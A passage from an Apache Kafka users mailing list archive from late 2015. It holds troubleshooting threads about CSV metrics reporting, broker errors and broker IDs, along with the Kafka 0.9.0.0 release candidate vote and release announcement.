applications to parse those metric names. It seems that we need a
CSVMetricsReporter that can deal with tagged names better. Many people also
use jmxtrans to export the Kafka metrics.

Thanks,

Jun

On Mon, Dec 14, 2015 at 10:32 AM, Andrew Grasso 
wrote:

> Hello,
>
> I've been trying to monitor a Kafka broker using the CSVMetricsReporter.
> However, when I start the broker, only a few csv files are created in the
> directory, and then there are repeated IOExceptions in the kafka.out log
> stating that CsvReporter.createStreamForMetric cannot create the file
> {path_to_metrics_dir}/LocalTimeMs.csv
>
> I can recreate this problem in 0.8.2.1, 0.8.2.2, and 0.9.0.0. CSV reporting
> works as expected in 0.8.1.1.
>
> I believe the problem is that in the later versions CSV files are being
> named from only the metric name, and not the tags. In 0.8.1.1, the
> LocalTimeMs metrics are given a name prefixed with a distinguishing source,
> while in later versions this information is passed as a tag. These tags are
> passed into the MetricName constructor in
> KafkaMetricsGroup.explicitMetricName, but as the mBeanName and not as the
> name.
>
> This is causing a name conflict, since CSV files are named off of the name
> field, not the mBeanName.
>
> For a similar reason, I cannot get metrics on partition specific data. The
> CSV reporter seems to not try any other metrics after raising an exception
> on LocalTimeMs. All metrics are published correctly to JMX.
>
> Has anyone encountered this problem? Is there a way to make CSV metrics
> work in the stable release (0.8.2.2)?
>
> It is possible I have missed something in following the code, as I am not
> very literate in Scala, but I am reasonably confident that my understanding
> of the code lines up with the behavior I've seen.
>
> I believe this behavior is related to an old issue, KAFKA-542
> 
>
> Best,
> Andrew Grasso
>

Re: 0.9.0.0 release notes is opening download mirrors page

2015-11-30 Thread Jun Rao

Kris,

It just points to the mirror site. If you click on one of the links, you
will see the release notes.

Thanks,

Jun

On Mon, Nov 30, 2015 at 1:37 PM, Kris K  wrote:

> Hi,
>
> Just noticed that the Release notes link of 0.9.0.0 is pointing to the
> download mirrors page.
>
>
> https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/RELEASE_NOTES.html
>
>
> Thanks,
> Kris K
>

Re: 0.9.0.0[error]

2015-11-25 Thread Jun Rao

Fredo,

Thanks for reporting this. Are you starting a brand new 0.9.0.0 cluster?
Are there steps that one can follow to reproduce this issue easily?

Jun

On Tue, Nov 24, 2015 at 10:52 PM, Fredo Lee  wrote:

> The content below is the report for kafka
>
> when i try to fetch coordinator broker, i get 6 for ever.
>
>
>
> [2015-11-25 14:48:28,638] ERROR [KafkaApi-1] error when handling request
> Name: FetchRequest; Version: 1; CorrelationId: 643; ClientId:
> ReplicaFetcherThread-0-4; ReplicaId:
> 1; MaxWait: 500 ms; MinBytes: 1 bytes; RequestInfo: [__consumer_offsets,49]
> -> PartitionFetchInfo(0,1048576),[__consumer_offsets,17] ->
> PartitionFetchInfo(0,1048576),[__con
> sumer_offsets,29] -> PartitionFetchInfo(0,1048576),[blcs,6] ->
> PartitionFetchInfo(0,1048576),[__consumer_offsets,41] ->
> PartitionFetchInfo(0,1048576),[__consumer_offsets,13
> ] -> PartitionFetchInfo(0,1048576),[__consumer_offsets,5] ->
> PartitionFetchInfo(0,1048576),[__consumer_offsets,37] ->
> PartitionFetchInfo(0,1048576),[__consumer_offsets,25]
> -> PartitionFetchInfo(0,1048576),[__consumer_offsets,1] ->
> PartitionFetchInfo(0,1048576) (kafka.server.KafkaApis)
> kafka.common.KafkaException: Should not set log end offset on partition
> [__consumer_offsets,49]'s local replica 1
> at kafka.cluster.Replica.logEndOffset_$eq(Replica.scala:66)
> at kafka.cluster.Replica.updateLogReadResult(Replica.scala:53)
> at
> kafka.cluster.Partition.updateReplicaLogReadResult(Partition.scala:240)
> at
>
> kafka.server.ReplicaManager$$anonfun$updateFollowerLogReadResults$2.apply(ReplicaManager.scala:852)
> at
>
> kafka.server.ReplicaManager$$anonfun$updateFollowerLogReadResults$2.apply(ReplicaManager.scala:849)
> at
> scala.collection.immutable.HashMap$HashMap1.foreach(HashMap.scala:221)
> at
> scala.collection.immutable.HashMap$HashTrieMap.foreach(HashMap.scala:428)
> at
>
> kafka.server.ReplicaManager.updateFollowerLogReadResults(ReplicaManager.scala:849)
> at
> kafka.server.ReplicaManager.fetchMessages(ReplicaManager.scala:467)
> at kafka.server.KafkaApis.handleFetchRequest(KafkaApis.scala:434)
> at kafka.server.KafkaApis.handle(KafkaApis.scala:69)
> at
> kafka.server.KafkaRequestHandler.run(KafkaRequestHandler.scala:60)
> at java.lang.Thread.run(Thread.java:722)
>

Re: upgrade to 0.9 and auto generated broker id

2015-11-25 Thread Jun Rao

broker.id is the identifier of the broker. If you have existing data, you
should preserve the broker.id. If you restart the broker with a new id, all
replicas stored with the old broker id are considered gone.

Thanks,

Jun

On Wed, Nov 25, 2015 at 7:20 AM, Evgeniy Shishkin 
wrote:

> Hello,
>
> i have a question regarding upgrade to 0.9
>
> Is it recommended to keep broker.id in config after upgrade?
> Will be there any dataloss or stuck replication if we remove broker.id
> and restart broker?
>
> Thanks.

Re: 0.9.0.0[error]

2015-11-25 Thread Jun Rao

Are you running any non-java client, especially a consumer?

Thanks,

Jun

On Wed, Nov 25, 2015 at 6:38 PM, Fredo Lee <buaatianwa...@gmail.com> wrote:

> this is my config file for original file with some changed by me.
>
> broker.id=1
> listeners=PLAINTEXT://:9092
> num.partitions=10
> log.dirs=/tmp/kafka-logs1
> zookeeper.connect=localhost:2181
> zookeeper.connection.timeout.ms=2000
> delete.topic.enable=true
> default.replication.factor=2
> auto.leader.rebalance.enable=true
>
>
> if i change listeners to 9093, it works There is no process running on
> this port!!
> i donot know why
>
>
> 2015-11-25 23:58 GMT+08:00 Jun Rao <j...@confluent.io>:
>
> > Fredo,
> >
> > Thanks for reporting this. Are you starting a brand new 0.9.0.0 cluster?
> > Are there steps that one can follow to reproduce this issue easily?
> >
> > Jun
> >
> > On Tue, Nov 24, 2015 at 10:52 PM, Fredo Lee <buaatianwa...@gmail.com>
> > wrote:
> >
> > > The content below is the report for kafka
> > >
> > > when i try to fetch coordinator broker, i get 6 for ever.
> > >
> > >
> > >
> > > [2015-11-25 14:48:28,638] ERROR [KafkaApi-1] error when handling
> request
> > > Name: FetchRequest; Version: 1; CorrelationId: 643; ClientId:
> > > ReplicaFetcherThread-0-4; ReplicaId:
> > > 1; MaxWait: 500 ms; MinBytes: 1 bytes; RequestInfo:
> > [__consumer_offsets,49]
> > > -> PartitionFetchInfo(0,1048576),[__consumer_offsets,17] ->
> > > PartitionFetchInfo(0,1048576),[__con
> > > sumer_offsets,29] -> PartitionFetchInfo(0,1048576),[blcs,6] ->
> > > PartitionFetchInfo(0,1048576),[__consumer_offsets,41] ->
> > > PartitionFetchInfo(0,1048576),[__consumer_offsets,13
> > > ] -> PartitionFetchInfo(0,1048576),[__consumer_offsets,5] ->
> > > PartitionFetchInfo(0,1048576),[__consumer_offsets,37] ->
> > > PartitionFetchInfo(0,1048576),[__consumer_offsets,25]
> > > -> PartitionFetchInfo(0,1048576),[__consumer_offsets,1] ->
> > > PartitionFetchInfo(0,1048576) (kafka.server.KafkaApis)
> > > kafka.common.KafkaException: Should not set log end offset on partition
> > > [__consumer_offsets,49]'s local replica 1
> > > at kafka.cluster.Replica.logEndOffset_$eq(Replica.scala:66)
> > > at kafka.cluster.Replica.updateLogReadResult(Replica.scala:53)
> > > at
> > > kafka.cluster.Partition.updateReplicaLogReadResult(Partition.scala:240)
> > > at
> > >
> > >
> >
> kafka.server.ReplicaManager$$anonfun$updateFollowerLogReadResults$2.apply(ReplicaManager.scala:852)
> > > at
> > >
> > >
> >
> kafka.server.ReplicaManager$$anonfun$updateFollowerLogReadResults$2.apply(ReplicaManager.scala:849)
> > > at
> > > scala.collection.immutable.HashMap$HashMap1.foreach(HashMap.scala:221)
> > > at
> > >
> scala.collection.immutable.HashMap$HashTrieMap.foreach(HashMap.scala:428)
> > > at
> > >
> > >
> >
> kafka.server.ReplicaManager.updateFollowerLogReadResults(ReplicaManager.scala:849)
> > > at
> > > kafka.server.ReplicaManager.fetchMessages(ReplicaManager.scala:467)
> > > at
> kafka.server.KafkaApis.handleFetchRequest(KafkaApis.scala:434)
> > > at kafka.server.KafkaApis.handle(KafkaApis.scala:69)
> > > at
> > > kafka.server.KafkaRequestHandler.run(KafkaRequestHandler.scala:60)
> > > at java.lang.Thread.run(Thread.java:722)
> > >
> >
>

[ANNOUCE] Apache Kafka 0.9.0.0 Released

2015-11-24 Thread Jun Rao

The Apache Kafka community is pleased to announce the release for
Apache Kafka 0.9.0.0. This a major release that includes (1)
authentication (through SSL and SASL) and authorization, (2) a new
java consumer, (3) a Kafka connect framework for data ingestion and
egression, and (4) quotas. It also includes many critical bug fixes.

All of the changes in this release can be found: 
https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/RELEASE_NOTES.html

Apache Kafka is high-throughput, publish-subscribe messaging system rethought 
of as a distributed commit log.

** Fast => A single Kafka broker can handle hundreds of megabytes of reads and
writes per second from thousands of clients.

** Scalable => Kafka is designed to allow a single cluster to serve as the 
central data backbone
for a large organization. It can be elastically and transparently expanded 
without downtime.
Data streams are partitioned and spread over a cluster of machines to allow 
data streams
larger than the capability of any single machine and to allow clusters of 
co-ordinated consumers.

** Durable => Messages are persisted on disk and replicated within the cluster 
to prevent
data loss. Each broker can handle terabytes of messages without performance 
impact.

** Distributed by Design => Kafka has a modern cluster-centric design that 
offers
strong durability and fault-tolerance guarantees.

You can download the source release from
https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/kafka-0.9.0.0-src.tgz

and binary releases from
https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/kafka_2.10-0.9.0.0.tgz
https://www.apache.org/dyn/closer.cgi?path=/kafka/0.9.0.0/kafka_2.11-0.9.0.0.tgz

A big thank you for the following people who have contributed to the
0.9.0.0 release.

Aditya Auradkar, Alexander Pakulov, Alexey Ozeritskiy, Alexis Midon,
Allen Wang, Anatoly Fayngelerin, Andrew Otto, Andrii Biletskyi, Anna
Povzner, Anton Karamanov, Ashish Singh, Balaji Seshadri, Ben Stopford,
Chris Black, Chris Cope, Chris Pinola, Daniel Compton, Dave Beech,
Dave Cromberge, Dave Parfitt, David Jacot, Dmytro Kostiuchenko, Dong
Lin, Edward Ribeiro, Eno Thereska, Eric Olander, Ewen
Cheslack-Postava, Fangmin Lv, Flavio Junqueira, Flutra Osmani, Gabriel
Nicolas Avellaneda, Geoff Anderson, Grant Henke, Guozhang Wang, Gwen
Shapira, Honghai Chen, Ismael Juma, Ivan Lyutov, Ivan Simoneko,
Jaikiran Pai, James Oliver, Jarek Jarcec Cecho, Jason Gustafson, Jay
Kreps, Jean-Francois Im, Jeff Holoman, Jeff Maxwell, Jiangjie Qin, Joe
Crobak, Joe Stein, Joel Koshy, Jon Riehl, Joshi, Jun Rao, Kostya
Golikov, Liquan Pei, Magnus Reftel, Manikumar Reddy, Marc Chung,
Martin Lemanski, Matthew Bruce, Mayuresh Gharat, Michael G. Noll,
Muneyuki Noguchi, Neha Narkhede, Onur Karaman, Parth Brahmbhatt, Paul
Mackles, Pierre-Yves Ritschard, Proneet Verma, Rajini Sivaram, Raman
Gupta, Randall Hauch, Sasaki Toru, Sriharsha Chintalapani, Steven Wu,
Stevo Slavic, Tao Xiao, Ted Malaska, Tim Brooks, Todd Palino, Tong Li,
Vivek Madani, Vladimir Tretyakov, Yaguo Zhou, Yasuhiro Matsuda,
Zhiqiang He 

We welcome your help and feedback. For more information on how to
report problems, and to get involved, visit the project website at 
http://kafka.apache.org/

Thanks,

Jun

Re: 0.9.0.0 RC4

2015-11-23 Thread Jun Rao

+1

Thanks,

Jun

On Fri, Nov 20, 2015 at 5:21 PM, Jun Rao <j...@confluent.io> wrote:

> This is the fourth candidate for release of Apache Kafka 0.9.0.0. This a
> major release that includes (1) authentication (through SSL and SASL) and
> authorization, (2) a new java consumer, (3) a Kafka connect framework for
> data ingestion and egression, and (4) quotas. Since this is a major
> release, we will give people a bit more time for trying this out.
>
> Release Notes for the 0.9.0.0 release
>
> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/RELEASE_NOTES.html
>
> *** Please download, test and vote by Monday, Nov. 23, 6pm PT
>
> Kafka's KEYS file containing PGP keys we use to sign the release:
> http://kafka.apache.org/KEYS in addition to the md5, sha1
> and sha2 (SHA256) checksum.
>
> * Release artifacts to be voted upon (source and binary):
> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/
>
> * Maven artifacts to be voted upon prior to release:
> https://repository.apache.org/content/groups/staging/
>
> * scala-doc
> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/scaladoc/
>
> * java-doc
> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/javadoc/
>
> * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.0 tag
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=132943b0f83831132cd46ac961cf6f1c00132565
>
> * Documentation
> http://kafka.apache.org/090/documentation.html
>
> /***
>
> Thanks,
>
> Jun
>
>

Re: 0.9.0.0 RC4

2015-11-23 Thread Jun Rao

Thanks everyone for voting.

The following are the results of the votes.

+1 binding = 4 votes (Neha Narkhede, Sriharsha Chintalapani, Guozhang Wang,
Jun Rao)
+1 non-binding = 3 votes
-1 = 0 votes
0 = 0 votes

The vote passes.

I will release artifacts to maven central, update the dist svn and download
site. Will send out an announce after that.

Jun

On Mon, Nov 23, 2015 at 8:46 PM, Jun Rao <j...@confluent.io> wrote:

> +1
>
> Thanks,
>
> Jun
>
> On Fri, Nov 20, 2015 at 5:21 PM, Jun Rao <j...@confluent.io> wrote:
>
>> This is the fourth candidate for release of Apache Kafka 0.9.0.0. This a
>> major release that includes (1) authentication (through SSL and SASL) and
>> authorization, (2) a new java consumer, (3) a Kafka connect framework for
>> data ingestion and egression, and (4) quotas. Since this is a major
>> release, we will give people a bit more time for trying this out.
>>
>> Release Notes for the 0.9.0.0 release
>>
>> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/RELEASE_NOTES.html
>>
>> *** Please download, test and vote by Monday, Nov. 23, 6pm PT
>>
>> Kafka's KEYS file containing PGP keys we use to sign the release:
>> http://kafka.apache.org/KEYS in addition to the md5, sha1
>> and sha2 (SHA256) checksum.
>>
>> * Release artifacts to be voted upon (source and binary):
>> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/
>>
>> * Maven artifacts to be voted upon prior to release:
>> https://repository.apache.org/content/groups/staging/
>>
>> * scala-doc
>> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/scaladoc/
>>
>> * java-doc
>> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/javadoc/
>>
>> * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.0 tag
>>
>> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=132943b0f83831132cd46ac961cf6f1c00132565
>>
>> * Documentation
>> http://kafka.apache.org/090/documentation.html
>>
>> /***
>>
>> Thanks,
>>
>> Jun
>>
>>
>

1 2 3 4 5 6 7 8 9 10 >

1 - 100 of 1375 matches

Mail list logo